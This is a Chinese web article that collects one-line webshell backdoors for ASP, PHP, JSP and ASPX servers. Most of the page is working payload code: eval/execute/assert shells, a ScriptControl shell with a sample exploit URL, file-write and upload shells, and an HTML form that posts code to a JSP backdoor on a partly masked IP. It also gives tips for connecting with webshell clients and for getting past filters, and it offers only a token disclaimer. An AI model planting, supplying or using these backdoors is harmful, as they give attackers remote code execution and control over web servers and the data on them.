2345技术员联盟

一句话木马大全,ASP一句话木马php一句话木马

看见过一些黑客入侵电脑的手段吧,有的就是用一句话木马进行入侵的,一句话是基于B/S结构的。
今天我们认识一下一句话木马,千万不要拿去干坏事。

asp一句话木马
 
程序后门代码
<%eval request("sb")%>
程序代码
<%execute request("sb")%>
程序代码
<%execute(request("sb"))%>
程序代码
<%execute request("sb")%><%'<% loop <%:%>
程序后门代码
<%'<% loop <%:%><%execute request("sb")%>
程序后门代码
<%execute request("sb")'<% loop <%:%>[code]
 [code]<script language=vbs runat=server>eval(request("sb"))</script>
程序代码
%><%Eval(Request(chr(35)))%><%
程序代码
<%eval request("sb")%>
程序后门代码
<%ExecuteGlobal request("sb")%>
程序代码
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
 //容错代码
 程序代码
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
 <%
 var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
lcx.性别((lcx.名字)+'');
 %>
 //使用冰狐一句话客户端链接
 程序后门代码
<%
Set o = Server.CreateObject("ScriptControl")
 o.language = "vbscript"
 o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
%>
调用示例:
程序代码
http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29
 
php一句话木马
 
程序后门代码
<?php eval($_POST[sb])?>
程序代码
<?php @eval($_POST[sb])?>
 //容错代码
 程序代码
<?php assert($_POST[sb]);?>
 //使用lanker一句话客户端的专家模式执行相关的php语句
 程序代码
<?$_POST['sa']($_POST['sb']);?>
程序代码
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
 @preg_replace("/[email]/e",$_POST['h'],"error");
 ?>
 //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
 程序代码
<O>h=@eval($_POST[c]);</O>
程序代码
<script language="php">@eval($_POST[sb])</script>
 //绕过<?限制的一句话
 
JSP一句话木马
 
程序后门代码
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
 %>
提交客户端
 程序后门代码
<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
 <textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
 <input type=submit value="提交">
 </form>
 ASPX一句话木马
 程序代码
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
程序代码
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
 //Jscript的asp.net一句话
 程序后门代码
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
 //C#的asp.net一句话
 程序代码
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>

相关文章

本文来自电脑技术网www.it892.com),转载本文请注明来源.
本文链接:http://www.it892.com/content/security/virus/20130328/4287.html
热点排行
无觅相关文章插件,快速提升流量